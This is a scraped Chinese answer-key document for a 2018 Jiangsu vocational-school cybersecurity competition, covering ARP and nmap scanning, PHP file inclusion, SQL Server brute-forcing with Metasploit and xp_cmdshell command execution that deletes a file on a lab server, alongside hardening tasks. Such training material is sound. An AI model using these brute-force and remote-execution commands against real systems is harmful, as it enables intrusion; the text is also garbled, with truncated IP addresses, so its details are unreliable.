江蘇省2018年度中職組網(wǎng)絡(luò)空間安全賽項(xiàng)樣題及答案.doc

1、。2018 年度全國(guó)職業(yè)技能大賽中職組“網(wǎng)絡(luò)空間安全”賽項(xiàng)江蘇省競(jìng)賽任務(wù)書(shū)（樣題）一、 競(jìng)賽時(shí)間9:00-12:00 ，共計(jì) 3 小時(shí)。二、競(jìng)賽階段簡(jiǎn)介競(jìng)賽階段任務(wù)階段競(jìng)賽任務(wù)競(jìng)賽時(shí)間分值任務(wù) 1ARP協(xié)議滲透測(cè)試15任務(wù) 2操作系統(tǒng)及應(yīng)用程序掃15第一階段單兵模式系描滲透測(cè)試9:00-11:00統(tǒng)滲透測(cè)試任務(wù) 3Web應(yīng)用程序文件包含20安全攻防任務(wù) 4數(shù)據(jù)庫(kù)安全加固20系統(tǒng)加固11:00-11:1530第二階段分組對(duì)抗11:15-12:00滲透測(cè)試-可編輯修改 -。三、競(jìng)賽任務(wù)書(shū)內(nèi)容（一） 拓?fù)鋱D（二）第一階段任務(wù)書(shū)任務(wù) 1.ARP掃描滲透測(cè)試任務(wù)環(huán)境說(shuō)明：服務(wù)器場(chǎng)景： CentOS5.5

2、服務(wù)器場(chǎng)景操作系統(tǒng)：CentOS5.51.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5 進(jìn)行 ARP掃描滲透測(cè)試（使用工具 arping ，發(fā)送請(qǐng)求數(shù)據(jù)包數(shù)量為5 個(gè)），并將該操作使用命令中固定不變的字符串作為 Flag 提交；Arping c 5 x.x.x.x2.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5 進(jìn)行 ARP掃描滲透測(cè)試（使用工具 arping ，發(fā)送請(qǐng)求數(shù)據(jù)包數(shù)量為5 個(gè)），并將該操作結(jié)果的最后 1 行，從左邊數(shù)第 2 個(gè)數(shù)字作為 Flag 提交；Arping c 5 x.x.x.x-可編輯修改 -。rootkali:# arping -c 5 1

3、22ARPING 22 from 00 eth0Unicast reply from 22 00:0C:29:62:80:73 1.017msUnicast reply from 22 00:0C:29:62:80:73 0.638msUnicast reply from 22 00:0C:29:62:80:73 1.051msUnicast reply from 22 00:0C:29:62:80:73 1.590msUnica

4、st reply from 22 00:0C:29:62:80:73 1.051msSent 5 probes (1 broadcast(s)Received 5 response(s)Flag:53.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5 進(jìn)行 ARP掃描滲透測(cè)試（使用工具 Metasploit 中 arp_sweep 模塊），并將工具 Metasploit中 arp_sweep 模塊存放路徑字符串作為 Flag （形式：字符串 1/ 字符串 2/ 字符串 3/ / 字符串 n）提交；msf use auxiliary/scanner/discov

5、ery/arp_sweepFlag:Auxiliary/scanner/discovery/arp_sweep4.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5 進(jìn)行 ARP掃描滲透測(cè)試（使用工具 Metasploit 中 arp_sweep 模塊），假設(shè)目標(biāo)服務(wù)器場(chǎng)景 CentOS5.5 在線，請(qǐng)將工具 Metasploit 中 arp_sweep 模塊運(yùn)行顯示結(jié)果的最后 1 行的最后 1 個(gè)單詞作為 Flag 提交；msf use auxiliary/scanner/discovery/arp_sweepmsf auxiliary(arp_sweep) run* 192.168

6、.28.122 appears to be up (VMware, Inc.).* appears to be up (VMware, Inc.).* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedFlag:completed5.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景CentOS5.5 進(jìn)行 ARP掃描滲透測(cè)試（使用工具 Metasploit中 arp_sweep 模塊），假設(shè)目標(biāo)服務(wù)器場(chǎng)景CentOS5.5 在線，請(qǐng)將工具 Metasploit中 arp_sweep

7、 模塊運(yùn)行顯示結(jié)果的第 1 行出現(xiàn)的 IP 地址右邊的第 1 個(gè)單詞作為 Flag 提交； msf auxiliary(arp_sweep) run* 22 appears to be up (VMware, Inc.).* appears to be up (VMware, Inc.).* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completed-可編輯修改 -。Flag:appears6.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景CentOS5.5 進(jìn)行

8、 ARP掃描滲透測(cè)試（使用工具 Metasploit中 arp_sweep 模塊），假設(shè)目標(biāo)服務(wù)器場(chǎng)景CentOS5.5 在線，請(qǐng)將工具 Metasploit中 arp_sweep 模塊的運(yùn)行命令字符串作為 Flag 提交；Flag:exploit or run任務(wù) 2. 操作系統(tǒng)及應(yīng)用程序掃描滲透測(cè)試任務(wù)環(huán)境說(shuō)明：服務(wù)器場(chǎng)景： CentOS5.5服務(wù)器場(chǎng)景操作系統(tǒng)：CentOS5.51. 通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5進(jìn)行 ping 掃描滲透測(cè)試（使用工具 nmap，使用參數(shù) n，使用必須要使用的參數(shù)），并將該操作使用命令中必須要使用的參數(shù)作為 Flag 提交；F

9、lag:Nmap n Sp x.x.x.x2. 通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5進(jìn)行 ping 掃描滲透測(cè)試（使用工具 nmap），并將該操作顯示結(jié)果的上數(shù)第3 行左數(shù)第 3 個(gè)單詞作為 Flag 提交；rootkali:# nmap -n -sP 22Starting Nmap 7.40 ( ) at 2017-12-10 19:59 EST Nmap scan report for 22Host is up (0.00069s latency).Nmap done: 1 IP addr

10、ess (1 host up) scanned in 0.09 secondsFlag:up3.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景CentOS5.5 進(jìn)行綜合性掃描滲透測(cè)試（使用工具 nmap，使用參數(shù) n，使用必須要使用的參數(shù)），并將該操作使用命令中必須要使用的參數(shù)作為Flag 提交；rootkali:# nmap -n -A 22Starting Nmap 7.40 ( ) at 2017-12-10 20:11 EST Nmap scan report for 22 Host is up (0.00025

11、s latency).Not shown: 998 closed portsPORTSTATE SERVICE VERSION22/tcp open sshOpenSSH 4.3 (protocol 2.0)| ssh-hostkey:|1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)-可編輯修改 -。|_2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA)111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:|program

12、 versionport/proto service|1000002111/tcprpcbind|1000002111/udprpcbind|1000241910/udpstatus|_1000241913/tcpstatusMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopTRACEROU

13、TEHOP RTTADDRESS10.25 ms 22OS and Service detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:Nmap n A x.x.x.x4.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5 進(jìn)行綜合性掃描滲透測(cè)試（使用工具 nmap，使用參數(shù) n，使用必須要使用的參數(shù)），并將該操作顯示結(jié)

14、果的最后 1 行最后 1 個(gè)單詞作為 Flag 提交； rootkali:# nmap -n -A 22Starting Nmap 7.40 ( ) at 2017-12-10 20:11 EST Nmap scan report for 22 Host is up (0.00025s latency).Not shown: 998 closed portsPORTSTATE SERVICE VERSION22/tcpopen sshOpenSSH 4.3 (protocol 2.0)| ssh-hostkey:|

15、1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)|_2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:4d:45:c4:c1:cd (RSA)111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:|program versionport/proto service|1000002111/tcprpcbind|1000002111/udprpcbind-可編輯修改 -。|1000241910/udpstatus|_1000241913/tcpstatusMAC Ad

16、dress: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopTRACEROUTEHOP RTTADDRESS10.25 ms 22OS and Service detection performed. Please report any incorrect results at https

17、://submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.22 secondsFlag:seconds5.通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5 進(jìn)行操作系統(tǒng)掃描滲透測(cè)試（使用工具 nmap，使用必須要使用的參數(shù)），并將該操作使用命令中必須要使用的參數(shù)作為 Flag 提交；rootkali:# nmap -O 22Starting Nmap 7.40 ( ) at 2017-12-10 20:13 EST Nmap scan report

18、for 22Host is up (0.00044s latency).Not shown: 998 closed portsPORTSTATE SERVICE22/tcp open ssh111/tcp open rpcbindMAC Address: 00:0C:29:62:80:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance:

19、 1 hopOS detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.80 secondsFlag:Nmap O x.x.x.x-可編輯修改 -。6. 通過(guò)通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5 進(jìn)行系統(tǒng)服務(wù)及版本號(hào)掃描滲透測(cè)試（使用工具 nmap，使用必須要使用的參數(shù)），并將該操作使用命令中必須要使用的參數(shù)作為 Flag 提交；Flag:Nmap sV x.

20、x.x.x7. 通過(guò)通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 CentOS5.5 進(jìn)行系統(tǒng)服務(wù)及版本號(hào)掃描滲透測(cè)試（使用工具 nmap，使用必須要使用的參數(shù)），并將該操作顯示結(jié)果的 SSH服務(wù)版本信息字符串作為 Flag 提交； rootkali:# nmap -sV 22Starting Nmap 7.40 ( ) at 2017-12-10 20:17 EST Nmap scan report for 22Host is up (0.00014s latency).Not shown: 998 closed po

21、rtsPORTSTATE SERVICE VERSION22/tcp open sshOpenSSH 4.3 (protocol 2.0)111/tcp open rpcbind 2 (RPC #100000)MAC Address: 00:0C:29:62:80:73 (VMware)Service detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 19.60 secondsFla

22、g:OpenSSH 4.3任務(wù) 3.Web應(yīng)用程序文件包含安全攻防任務(wù)環(huán)境說(shuō)明：服務(wù)器場(chǎng)景名稱： WebServ2003服務(wù)器場(chǎng)景安全操作系統(tǒng)：Microsoft Windows2003 Server服務(wù)器場(chǎng)景安裝中間件：Apache2.2；服務(wù)器場(chǎng)景安裝Web開(kāi)發(fā)環(huán)境： Php6；服務(wù)器場(chǎng)景安裝數(shù)據(jù)庫(kù)：Microsoft SqlServer2000；服務(wù)器場(chǎng)景安裝文本編輯器：EditPlus ；1. 訪問(wèn) WebServ2003服務(wù)器場(chǎng)景， /-Display Uploadeds File Content ，分析該頁(yè)面源程序，找到提交的變量名，并將該變量名作為 Flag （形式： name=

23、“變量名”）提交；2.對(duì)該任務(wù)題目 1 頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試， 通過(guò) php:/filter協(xié)議使當(dāng)前頁(yè)面以 Base64 編碼方式回顯 WebServ2003服務(wù)器場(chǎng)景訪問(wèn)日志文件：AppServ/Apache2.2/logs/flag.log的內(nèi)容，并將注入語(yǔ)句作為Flag 提交；-可編輯修改 -。3. 對(duì)該任務(wù)題目 2 頁(yè)面注入點(diǎn)進(jìn)行注入以后， 將當(dāng)前頁(yè)面以 Base64 編碼方式回顯內(nèi)容作為 Flag 提交；4. 通過(guò) PHP函數(shù)對(duì)題目 3 中 Base64 編碼回顯內(nèi)容進(jìn)行解碼， 并將解碼內(nèi)容作為 Flag 提交；5.進(jìn)入 WebServ2003服務(wù)器場(chǎng)景的目錄， 找到 Displ

24、ayFileCtrl.php文件，使用 EditPlus 工具打開(kāi)并填寫(xiě)該文件中空缺的 F1、 F2、F3、F4 的值，使之可以抵御文件包含滲透測(cè)試，并提交 Flag （形式： F1|F2|F3|F4 ）；6. 再次對(duì)該任務(wù)題目 1 頁(yè)面注入點(diǎn)進(jìn)行滲透測(cè)試，驗(yàn)證此次利用該注入點(diǎn)對(duì) WebServ2003服務(wù)器場(chǎng)景進(jìn)行文件包含滲透測(cè)試無(wú)效，并將回顯頁(yè)面源文件內(nèi)容作為 Flag 提交；任務(wù) 4. 數(shù)據(jù)庫(kù)安全加固任務(wù)環(huán)境說(shuō)明：服務(wù)器場(chǎng)景名稱： WebServ2003服務(wù)器場(chǎng)景安全操作系統(tǒng)：Microsoft Windows2003 Server服務(wù)器場(chǎng)景安裝中間件：Apache2.2；服務(wù)器場(chǎng)景安裝

25、Web開(kāi)發(fā)環(huán)境： Php6；服務(wù)器場(chǎng)景安裝數(shù)據(jù)庫(kù)：Microsoft SqlServer2000；服務(wù)器場(chǎng)景安裝文本編輯器：EditPlus ；1. 對(duì)服務(wù)器場(chǎng)景 WebServ2003安裝補(bǔ)丁，使其中的數(shù)據(jù)庫(kù) Microsoft SqlServer2000 能夠支持遠(yuǎn)程連接，并將補(bǔ)丁包程序所在目錄名稱作為Flag 提交；2. 對(duì)服務(wù)器場(chǎng)景 WebServ2003安裝補(bǔ)丁，使其中的數(shù)據(jù)庫(kù) Microsoft SqlServer2000 能夠支持遠(yuǎn)程連接，在安裝補(bǔ)丁后的服務(wù)器場(chǎng)景中運(yùn)行 netstat an 命令，將回顯的數(shù)據(jù)庫(kù)服務(wù)連接狀態(tài)作為 Flag 提交；C:Documents and S

26、ettingsAdministratornetstat -an Active ConnectionsProtoLocal AddressForeign AddressStateTCP:13:0LISTENINGTCP:44:0LISTENINGTCP:10:0LISTENINGTCP:143:0LISTENINGTCP31:139 :0LISTENINGUDP:445*:*UDP:500*:*-可編輯修改 -

27、。UDP:1434*:*UDP:4500*:*UDP:123*:*UDP31:123*:*UDP31:137*:*UDP31:138*:*Flag:LISTENING3. 通過(guò) PC2中的滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 WebServ2003進(jìn)行數(shù)據(jù)庫(kù)服務(wù)掃描滲透測(cè)試，并將掃描結(jié)果作為 Flag 提交；msf use auxiliary/scanner/mssql/mssql_ping msf auxiliary(mssql_ping) run* 31:- S

28、QL Server information for31:+ 31:-ServerName= SERVER+ 31:-InstanceName = MSSQLSERVER+ 31:-IsClustered= No+ 31:-Version= 8.00.194+ 31:-tcp= 1433+ 31:-np=SERVERpipesqlquery* Scanned 1 of 1 hosts (100% complete)* Auxili

29、ary module execution completed4. 通過(guò) PC2中的滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 WebServ2003進(jìn)行數(shù)據(jù)庫(kù)服務(wù)超級(jí)管理員口令暴力破解（使用 PC2中的滲透測(cè)試平臺(tái)中的字典文件 superdic.txt ），并將破解結(jié)果中的最后一個(gè)字符串作為 Flag 提交； msf use auxiliary/scanner/mssql/mssql_loginmsf auxiliary(mssql_login) set username sa msf auxiliary(mssql_login) set pass_file /usr/share/wordlists/metas

30、ploit/password.lst msf auxiliary(mssql_login) run* 31:1433 - 31:1433 - MSSQL - Starting authentication scanner.! 31:1433 - No active DB - Credential data will not be saved!- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )

31、- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )-可編輯修改 -。- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!#$%& (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!#$%&* (Incorrect: )- 31

32、:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!boerbul (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!boerseun (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!gatvol (Incorrect: )- 31:1433- 192.168.28.

33、131:1433 - LOGIN FAILED:WORKSTATIONsa:!hotnot (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!kak (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!koedoe (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:

34、WORKSTATIONsa:!likable (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!poes (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!pomp (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!soutpiel

35、(Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:.net (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:0 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:000000 (Incorrect: )- 31:1

36、433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:00000000 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:0007 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:007 (Incorrect: )- 31:1433- 31:1433 -

37、LOGIN FAILED:WORKSTATIONsa:007007 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:0s (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:0th (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1 (I

38、ncorrect: )-可編輯修改 -。- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:10 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:100 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1000 (Incorrect: )- 192.168.28.

39、131:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1000s (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:100s (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1022 (Incorrect: )- 31:1433- 31:1433

40、 - LOGIN FAILED:WORKSTATIONsa:10s (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:10sne1 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1111 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa

41、:11111 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:111111 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:11111111 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:112233 (Incorrect: )-

42、31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1212 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:121212 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1213 (Incorrect: )- 31:1433- 192.168

43、.28.131:1433 - LOGIN FAILED:WORKSTATIONsa:1214 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1225 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:123 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WOR

44、KSTATIONsa:123123 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:123321 (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:1234 (Incorrect: )-可編輯修改 -。- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:12345

45、(Incorrect: )+ 31:1433 - 31:1433 - LOGIN SUCCESSFUL: WORKSTATIONsa:123456* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedFlag: completed5.通過(guò) PC2中 de1 滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 WebServ2003進(jìn)行數(shù)據(jù)庫(kù)服務(wù)擴(kuò)展存儲(chǔ)過(guò)程進(jìn)行利用，刪除 WebServ2003服務(wù)器場(chǎng)景 C:1.txt ，并將滲透測(cè)試?yán)妹钜约皾B透測(cè)試平臺(tái) run 結(jié)果第

46、1 行回顯作為 Flag 提交；msf auxiliary(mssql_login) use auxiliary/admin/mssql/mssql_exec msf auxiliary(mssql_exec) set rhost 31 msf auxiliary(mssql_exec) set password 123456msf auxiliary(mssql_exec) set cmd cmd.exe /c del C:1.txtmsf auxiliary(mssql_exec) run* 31:1433 - SQL Query: EXEC

47、 master.xp_cmdshell cmd.exe /c del C:1.txtoutput-* Auxiliary module execution completedFlag: * 31:1433 - SQL Query: EXEC master.xp_cmdshell cmd.exe /c del C:1.txt6. 通過(guò)對(duì)服務(wù)器場(chǎng)景 WebServ2003的數(shù)據(jù)庫(kù)服務(wù)進(jìn)行安全加固，阻止 PC2 中滲透測(cè)試平臺(tái)對(duì)其進(jìn)行數(shù)據(jù)庫(kù)超級(jí)管理員密碼暴力破解滲透測(cè)試，并將加固身份驗(yàn)證選項(xiàng)中的最后一個(gè)字符串作為 Flag 提交：W7. 驗(yàn)證在 WebServ2003的數(shù)據(jù)庫(kù)

48、服務(wù)進(jìn)行安全加固后，再次通過(guò) PC2中滲透測(cè)試平臺(tái)對(duì)服務(wù)器場(chǎng)景 WebServ2003進(jìn)行數(shù)據(jù)庫(kù)服務(wù)超級(jí)管理員口令進(jìn)行暴力破解（使用 PC2中的滲透測(cè)試平臺(tái)中的字典文件superdic.txt ），并將破解結(jié)果的從上向下數(shù)第 3 行內(nèi)容作為 Flag 提交； msf auxiliary(mssql_login) run-可編輯修改 -。* 31:1433 - 31:1433 - MSSQL - Starting authentication scanner.! 31:1433 - No active DB - Creden

49、tial data will not be saved!- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$%& (Incorre

50、ct: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!#$%&* (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!boerbul (Incorrect: )- 31:1433 - 31:1433 - LOGIN FAILED: WORKSTATIONsa:!boerseun (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!gatvol (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!hotnot (Incorrect: )- 31:1433- 31:1433 - LOGIN FAILED:WORKSTATIONsa:!kak (Incorrect: )-